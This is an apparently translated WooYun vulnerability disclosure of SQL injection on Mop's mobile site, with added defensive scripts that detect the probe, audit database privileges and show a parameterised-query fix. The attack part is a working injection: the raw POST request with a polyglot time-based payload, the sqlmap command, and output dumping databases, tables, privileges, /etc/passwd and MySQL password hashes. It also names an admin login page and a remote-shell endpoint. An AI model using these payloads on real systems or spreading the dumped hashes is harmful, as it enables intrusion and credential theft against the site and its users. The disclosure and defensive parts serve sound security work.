WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2014-10-15: Details submitted to the vendor and awaiting vendor handling
2014-10-15: Vendor confirmed; details visible to the vendor only
2014-10-25: Details disclosed to core white hats and relevant domain experts
2014-11-04: Details disclosed to regular white hats
2014-11-14: Details disclosed to intern white hats
2014-11-29: Details disclosed to the public
A Mop subsite has a SQL injection vulnerability; the database account has very broad privileges and multiple databases are affected
payload:
POST /viewmessage_new.jsp?log=1&mypage=viewmessage_new.jsp&ufstr=141325665400905&uid=2042281654&uidt=2084414119&version=5 HTTP/1.1
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://m.mop.com:80/
Cookie: mop3gVer=5; _mopwap_UID_T=2084414119; _mopwap_UVSTR=141325665400905; JSESSIONID=aaalWnp4J2Ntkf5YsQmKu; Hm_lpvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; Hm_lvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; _mopwapuuid=b940d441-563a-407e-82d8-7a1396e7bf55;
Host: m.mop.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/

Method:
root@kali:~# sqlmap -r '/root/Desktop/2' --data="curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] n
Are you sure you want to continue? [y/N] y

Details:
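Detection logic for the probe shape shown in the payload and in the sqlmap run, as an added example that is not part of the original report. It URL-decodes each POST parameter and flags the three things the report's payload and sqlmap's confirmation payload rely on: a delay function (sleep()/benchmark()), the /*' ... '" ... "*/ wrapper that lets a single string parse whether the parameter lands in an unquoted, single-quoted or double-quoted context, and an appended tautology such as AND 8260=8260. The request bodies are constructed from the report's payload, not captured traffic; the double-encoded variant is an assumption included to exercise the decoder.

```python
"""Flag time-based blind SQL injection probes in captured POST bodies.

Added example for this report (not the reporter's or Mop's code). The
request bodies in SAMPLE_BODIES are constructed, not real m.mop.com traffic.
"""
import re
from urllib.parse import parse_qs, unquote

# Delay primitives used by time-based blind probes (MySQL sleep()/benchmark()).
TIME_DELAY = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# The report's wrapper: /*' ... '" ... "*/ around repeated copies of the
# subquery, so one string parses in unquoted, '-quoted and "-quoted contexts.
# Flag the wrapper itself rather than guessing which quote the app uses.
QUOTE_POLYGLOT = re.compile(r"/\*'.*'\".*\"\*/", re.DOTALL)
# sqlmap's confirmation suffixes: AND 8260=8260 / AND 'lire'='lire (the app
# supplies the closing quote, so none is required after the backreference).
TAUTOLOGY = re.compile(r"\band\s+(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2", re.IGNORECASE)


def decode_param(value: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly (parse_qs already did one round and handled '+');
    probes are sometimes double-encoded to slip past a single-decode filter."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def score_request(body: str) -> dict:
    """Return {parameter: [indicator names]} for each parameter that looks like a probe."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_param(raw)
            hits = []
            if TIME_DELAY.search(decoded):
                hits.append("time-delay function")
            if QUOTE_POLYGLOT.search(decoded):
                hits.append("quote-context polyglot comment")
            if TAUTOLOGY.search(decoded):
                hits.append("boolean tautology")
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


# Constructed sample bodies (labelled as such; not captured traffic).
POLYGLOT = (
    "(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)"
    "%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"
)
SAMPLE_BODIES = [
    # benign message-list request
    "curpage=1&email1=someone%40example.com",
    # the probe shape from the report
    "curpage=1&email1=" + POLYGLOT,
    # sqlmap's time-based confirmation payload from the report
    "curpage=1&email1=" + POLYGLOT + "'%20AND%20SLEEP(5)%20AND%20'lire'%3D'lire",
    # assumed double-encoded variant: %2527 -> %27 -> '
    "curpage=1&email1=a%2527%2520AND%2520SLEEP(5)%2520AND%2520%25271%2527%253D%25271",
]


def scan(bodies=SAMPLE_BODIES) -> list:
    """Score every sample body; an empty dict means nothing was flagged."""
    return [score_request(b) for b in bodies]


if __name__ == "__main__":
    for body, result in zip(SAMPLE_BODIES, scan()):
        print(result or "clean", "<-", body[:60])
```

The polyglot rule is the one worth keeping even if the others are tuned down: a delay function alone fires on legitimate SQL-looking text in forum posts, but a comment opened immediately after a quote and closed after a double quote has no business in an e-mail address field.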
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: email1
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND 8260=8260 AND 'CKtN'='CKtN

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND SLEEP(5) AND 'lire'='lire
---
[15:01:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[15:01:13] [INFO] fetching current database
[15:01:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:01:13] [INFO] retrieved:
[15:01:15] [WARNING] reflective value(s) found and filtering out
mop
current database: 'mop'
[15:01:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times
[15:01:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/m.mop.com'
available databases [8]:
[*] app
[*] focus
[*] information_schema
[*] mop
[*] mysql
[*] performance_schema
[*] test
[*] userlog
current user: 'wapuser@10.%'
Database: mop
[211 tables]
+-------------------------------------+
| Login_MP_Receive |
| UserBusiness_201101 |
| UserBusiness_201102 |
| UserBusiness_201103 |
| UserBusiness_201104 |
| UserBusiness_201105 |
| UserBusiness_201106 |
| UserBusiness_201107 |
| UserBusiness_201108 |
| UserBusiness_201109 |
| UserBusiness_201110 |
| UserBusiness_201111 |
| UserBusiness_201112 |
| UserBusiness_201201 |
| UserBusiness_201202 |
| UserBusiness_201203 |
| UserBusiness_201204 |
| UserBusiness_201205 |
| UserBusiness_201206 |
| UserBusiness_201207 |
| UserBusiness_201208 |
| UserBusiness_201209 |
| UserBusiness_201210 |
| UserBusiness_201211 |
| UserBusiness_201212 |
| UserBusiness_201301 |
| UserBusiness_201302 |
| UserBusiness_201303 |
| UserBusiness_201304 |
| UserBusiness_201305 |
| UserBusiness_201306 |
| UserBusiness_201307 |
| UserBusiness_201308 |
| UserBusiness_201309 |
| UserBusiness_201310 |
| UserBusiness_201311 |
| UserBusiness_201312 |
| UserBusiness_201401 |
| UserBusiness_201402 |
| UserBusiness_201403 |
| UserBusiness_201404 |
| UserBusiness_201405 |
| UserBusiness_201406 |
| UserBusiness_201407 |
| UserBusiness_201408 |
| UserBusiness_201409 |
| UserBusiness_201410 |
| UserOperate_201201 |
| UserOperate_201202 |
| UserOperate_201203 |
| UserOperate_201204 |
| UserOperate_201205 |
| UserOperate_201206 |
| UserOperate_201207 |
| UserOperate_201208 |
| UserOperate_201209 |
| UserOperate_201210 |
| UserOperate_201211 |
| UserOperate_201212 |
| UserOperate_201301 |
| UserOperate_201302 |
| UserOperate_201303 |
| UserOperate_201304 |
| UserOperate_201305 |
| UserOperate_201306 |
| UserOperate_201307 |
| UserOperate_201308 |
| UserOperate_201309 |
| UserOperate_201310 |
| UserOperate_201311 |
| UserOperate_201312 |
| UserOperate_201401 |
| UserOperate_201402 |
| UserOperate_201403 |
| UserOperate_201404 |
| UserOperate_201405 |
| UserOperate_201406 |
| UserOperate_201407 |
| UserOperate_201408 |
| UserOperate_201409 |
| UserOperate_201410 |
| 3g_edit_sublist2 |
| 3g_edit_sublist |
| 3g_hotclick_info |
| 3g_hotclick_statistic |
| 3g_huodong_view |
| 3g_huodong_views_syn_list |
| 3g_huodong_views |
| 3g_investigate1_detail |
| 3g_tjzq_list_hisbak |
| 3g_tjzq_list |
| 3g_topRegion |
| 3gpet_enter |
| 3gpet_mm_record |
| admin_Lefttree |
| admin_data_review |
| admin_operator_permission |
| article |
| article_info |
| audit_images |
| audit_images_20100720 |
| audit_images_process |
| audit_images_source |
| baidu_keywords |
| business_detail |
| business_detail_20100720 |
| business_text |
| checkin |
| client_statistics |
| day_receive_login_mp |
| day_receive_login_mpBK1105 |
| day_statistic_normal |
| email_record |
| hi_send_log |
| hot_column |
| hozom_bind |
| huati_table |
| huati_table_tbak |
| huati_table_wcup |
| huodong_table_3g |
| image_monitor_log |
| ipdata |
| keywords_2009 |
| login_times_patch |
| mobile_area |
| mobile_bind |
| mobile_bind_tmp |
| mobile_up_message |
| monthData |
| mp_limit |
| mp_limit_dzh2 |
| mp_tmp |
| mp_tmp2 |
| mp_tmp_ok |
| passport_delete_user |
| passport_delete_user_1 |
| passport_delete_user_tmp |
| postReplyStatistics |
| progress |
| purge_pic_upload3_postimg1 |
| quote_reply |
| quote_reply2 |
| recent_subject |
| refere_login_temp |
| refere_reg_temp |
| refere_statistics |
| refere_statistics_temp |
| referer_domain |
| reg_login_num |
| reg_login_num2 |
| reg_login_num_week |
| register_return_dzh |
| register_return_dzh2 |
| register_return_dzh_week |
| request_header_info |
| request_header_notwap |
| send_feed |
| shualiang |
| shualiang_group |
| stat_page_href |
| statistic_back_login |
| statistic_login_idlist |
| statistic_reg_convert |
| statistic_reg_idlist |
| statistic_source |
| statistics |
| statistics_new |
| stockReward |
| subject_key |
| temp_focus |
| tmp_2 |
| topic_subject |
| torch_application |
| torch_union |
| unionSubReward |
| unionSubRewardRec |
| union_login_total |
| url_counter |
| usermessage |
| usermessage0 |
| usermessage_info |
| uv_statistics |
| wap_auth_user |
| wap_auth_user_path |
| wap_auth_user_temp |
| wap_auto_login |
| wap_auto_login20110907 |
| wap_auto_login_path |
| wap_hotclick_statistic |
| wap_site_info |
| wap_site_linkOutStatistics |
| wap_site_linkOutStatistics_baksLink |
| wap_site_statistics |
| wap_system_prop |
| wap_time_statistic |
| wap_user_equip |
| wap_user_ext |
| wap_user_mobile |
| wap_user_prop |
| wap_user_set |
| wap_user_telnum |
| wl_mobile_statistics |
| wl_statirtics |
| wl_time_statistics |
| wl_time_statistics_backup20120221 |
| wl_time_statistics_bak120531 |
| wl_time_statistics_bak121026 |
| wl_uv_statistics |
| xn_connector |
| xn_reg |
| xn_reg_bak_091104 |
+-------------------------------------+
Database: mop
Table: wap_auth_user
[12 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| time           | datetime     |
| block_order    | varchar(100) |
| block_show_num | varchar(100) |
| font_size      | int(11)      |
| login_key      | varchar(200) |
| login_times    | int(11)      |
| mp             | int(10)      |
| show_num       | int(11)      |
| show_pic       | int(11)      |
| user_id        | int(11)      |
| user_name      | varchar(100) |
| wc_show_num    | int(11)      |
+----------------+--------------+

Database privileges and scope:
database management system users privileges:
[*] %% (administrator) [28]: ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE, USAGE
[*] %beauty% [1]: REPLICATION SLAVE
[*] %root% (administrator) [27]: ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE
[*] %slave% (administrator) [27]: ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE
[*] %wapuser% (administrator) [27]: ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE
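The privilege dump is the part of this report a database owner should act on: the web account wapuser holds the same 27 global privileges as root, and FILE is exactly what turns the injection into the load_file('/etc/passwd') read shown below. The following audit script is an added example, not the reporter's or Mop's code. It parses a sqlmap privileges listing in either the one-privilege-per-line form sqlmap prints or the compacted one-line form, reports which privileges each account holds beyond what its role needs, and drafts the REVOKE for the over-privileged ones. The sample dump is reconstructed from the report for beauty and wapuser only; wapuser's host '10.%' comes from the report's "current user" line, the assumption that beauty is a replication account is mine, and the per-role allowlists are assumptions.

```python
"""Audit a sqlmap --privileges listing for over-privileged web application accounts.

Added example for this report (not the reporter's or Mop's code). SAMPLE_DUMP is
reconstructed from the report for two of its five accounts; role allowlists and
beauty's role are assumptions.
"""
import re

# Global privileges a web application account should never hold, and why.
DANGEROUS = {
    "FILE": "load_file()/SELECT ... INTO OUTFILE on the database host",
    "SUPER": "set global variables, kill sessions, bypass read_only",
    "PROCESS": "read other sessions' running statements",
    "SHUTDOWN": "stop the server",
    "RELOAD": "FLUSH PRIVILEGES and flush logs",
    "CREATE USER": "create further accounts",
    "GRANT OPTION": "hand privileges to other accounts",
    "REPLICATION SLAVE": "stream the complete binary log",
}
# Assumed allowlists per role; anything outside is reported as excess.
APP_ALLOWLIST = {"SELECT", "INSERT", "UPDATE", "DELETE", "USAGE"}
ROLE_ALLOWLISTS = {
    "wapuser": APP_ALLOWLIST,                       # the web application account
    "beauty": {"REPLICATION SLAVE", "USAGE"},       # assumed replication account
}

# "[*] %wapuser% (administrator) [27]:" optionally followed by a comma list.
ACCOUNT_RE = re.compile(
    r"^\[\*\]\s+%?(?P<user>[^%\s]*)%?\s*(?:\((?P<role>[^)]*)\)\s*)?\[(?P<n>\d+)\]:\s*(?P<rest>.*)$"
)
PRIV_RE = re.compile(r"^\s*privilege:\s+(?P<priv>.+?)\s*$")


def parse_privileges(dump: str) -> dict:
    """Map each account name in the listing to the set of privileges it holds."""
    accounts, current = {}, None
    for line in dump.splitlines():
        m = ACCOUNT_RE.match(line.strip())
        if m:
            current = m.group("user") or "<anonymous>"
            accounts[current] = set()
            # compacted form: privileges on the header line itself
            accounts[current].update(
                p.strip().upper() for p in m.group("rest").split(",") if p.strip()
            )
            continue
        m = PRIV_RE.match(line)
        if m and current is not None:           # sqlmap's native one-per-line form
            accounts[current].add(m.group("priv").upper())
    return accounts


def audit(accounts: dict, allowlists: dict = ROLE_ALLOWLISTS) -> dict:
    """Per account: the dangerous privileges it holds and everything beyond its role."""
    report = {}
    for user, privs in accounts.items():
        allowed = allowlists.get(user, APP_ALLOWLIST)
        report[user] = {
            "dangerous": sorted(p for p in privs if p in DANGEROUS),
            "excess": sorted(privs - allowed),
        }
    return report


def revoke_statement(user: str, host: str, privs) -> str:
    """Draft the REVOKE that strips the given global privileges from one account.
    USAGE is skipped: in MySQL it means 'no privileges' and cannot be revoked."""
    names = sorted(p for p in privs if p != "USAGE")
    return "REVOKE {} ON *.* FROM '{}'@'{}';".format(", ".join(names), user, host)


# Reconstructed from the report (two accounts; one in each listing form).
SAMPLE_DUMP = (
    "database management system users privileges:\n"
    "[*] %beauty% [1]:\n"
    "    privilege: REPLICATION SLAVE\n"
    "[*] %wapuser% (administrator) [27]: ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, "
    "CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, "
    "FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, "
    "REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE\n"
)


def run_audit(dump: str = SAMPLE_DUMP) -> dict:
    """Parse, audit, and attach a draft REVOKE for the web account (host from the report)."""
    report = audit(parse_privileges(dump))
    if report.get("wapuser", {}).get("excess"):
        report["wapuser"]["revoke"] = revoke_statement("wapuser", "10.%", report["wapuser"]["excess"])
    return report


if __name__ == "__main__":
    for user, entry in run_audit().items():
        print(user, entry)
```

The REVOKE removes the global grants; the remaining step is to grant the application's SELECT/INSERT/UPDATE/DELETE on mop.* only, so that a future injection cannot reach mysql.user or the other seven databases listed above. Setting secure_file_priv on the server is a second, independent guard against load_file() even if FILE is ever re-granted.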
select load_file('/etc/passwd');:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
uuidd:x:498:499:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mysql:x:497:498:MySQL server:/var/lib/mysql:/bin/bash
Backend:
Backend login: http://m.mop.com/admin/login.jsp
Database accounts:
select user,password from mysql.user; [13]:
[*] beauty,
[*] wapuser,
[*] slave,
[*] wapuser,
[*] slave,
[*] wapuser,
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *9DFF44DFF4007B348C4AC352751C6AAE5B562A8C
[*] wapuser, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
System administrator entry point: http://m.mop.com/test/server_rsh.jsp. From there a shell could be obtained and the database dumped (neither was done; I did not go any further).
I like browsing Mop myself; a gift would be nice.
1. Apply proper filtering in the code.
2. Set database privileges correctly.
3. Restrict access to the backend.
4. Restrict system accounts; otherwise certain files can be read.
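Item 1 of the fix list is the root cause, and "filtering" undersells it: the durable fix is to stop building the statement from the email1 value and pass it as a bound parameter. The block below is an added example, not the Mop application's code. The real endpoint is JSP on MySQL; Python's sqlite3 is used as a stand-in so the example runs offline, and the table and column names are assumptions. It runs the report's own email1 value through a string-built query and through a parameterised one: SQLite has no sleep() function, so the string-built version fails at parse time (proof that the input was compiled as SQL, which on MySQL is where the delay would occur), while the parameterised version treats the whole value as an address that simply matches nothing.

```python
"""String-built query beside its parameterised fix, driven by the report's payload.

Added example for this report; not the Mop application's code. sqlite3 stands in
for the JSP/MySQL stack so this runs offline; table and column names are assumed.
"""
import sqlite3
from urllib.parse import unquote

# The email1 value from the report's request, URL-decoded once.
REPORT_PAYLOAD = unquote(
    "(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)"
    "%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"
)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the message table, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usermessage (id INTEGER, email TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO usermessage VALUES (?, ?, ?)",
        [(1, "alice@example.com", "hello"), (2, "bob@example.com", "hi")],
    )
    return conn


def find_messages_unsafe(conn, email: str):
    """The defect: the value is pasted into the statement text, so the database
    parses it as SQL. The report's probe closes the quote, appends a subquery
    and leaves the rest inside a comment or string so the statement still parses."""
    sql = "SELECT id, body FROM usermessage WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def find_messages_safe(conn, email: str):
    """The fix: a placeholder. The driver sends the value separately from the
    statement text, so quotes, comments and subqueries in it are just characters."""
    sql = "SELECT id, body FROM usermessage WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


def compare(email: str) -> dict:
    """Run one input through both versions; record the rows or the parser error."""
    conn = make_db()
    out = {}
    try:
        out["unsafe"] = find_messages_unsafe(conn, email)
    except sqlite3.OperationalError as exc:
        out["unsafe"] = "SQL error: " + str(exc)  # the input reached the SQL compiler
    out["safe"] = find_messages_safe(conn, email)
    return out


if __name__ == "__main__":
    print(compare("alice@example.com"))
    print(compare(REPORT_PAYLOAD))
```

In the JSP endpoint the equivalent is a PreparedStatement with setString() for email1 instead of string concatenation; an input filter can sit in front of it as defence in depth, but on its own it is what the /*' ... '" ... "*/ wrapper in this report was built to get past.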
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2014-10-15 17:14
Thank you, many thanks!
None yet